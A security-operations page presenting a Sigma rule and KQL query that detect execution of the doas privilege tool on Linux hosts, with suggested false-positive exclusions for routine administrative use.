Adversaries may use the doas tool to escalate privileges by executing commands as root without proper authorization. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential privilege escalation attempts that could lead to deeper system compromise.
Detection Rule
title: Linux Doas Tool Execution
id: 067d8238-7127-451c-a9ec-fa78045b618b
status: stable
description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
references:
- https://research.splunk.com/endpoint/linux_doas_tool_execution/
- https://www.makeuseof.com/how-to-install-and-use-doas/
author: Sittikorn S, Teoderick Contreras
date: 2022-01-20
tags:
- attack.defense-evasion
- attack.privilege-escalation
- attack.t1548
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/doas'
condition: selection
falsepositives:
- Unlikely
level: low
imProcessCreate
| where TargetProcessName endswith "/doas"Scenario: Scheduled system maintenance task using doas to update packages
Filter/Exclusion: Check for doas commands that include apt, yum, or dnf in the command line, and filter out known maintenance scripts located in /etc/cron.d/ or /var/spool/cron/.
Scenario: Regular user runs doas to configure network settings using ifconfig or ip tools
Filter/Exclusion: Exclude commands that include ifconfig, ip, or nmcli and are executed by users in the network or admin group.
Scenario: System administrators use doas to manage service configurations via systemctl or service commands
Filter/Exclusion: Filter out commands that include systemctl, service, or init and are executed from /etc/init.d/ or /usr/lib/systemd/.
Scenario: Automated backup scripts use doas to access backup directories or perform file system checks
Filter/Exclusion: Exclude commands that include tar, rsync, or fsck and are sourced from /opt/backup/ or /usr/local/backup/.
Scenario: Developers use doas to install local development tools or dependencies in their home directories
Filter/Exclusion: Filter out commands that include npm, pip, or cargo and are executed from user home directories (e.g., /home/user/).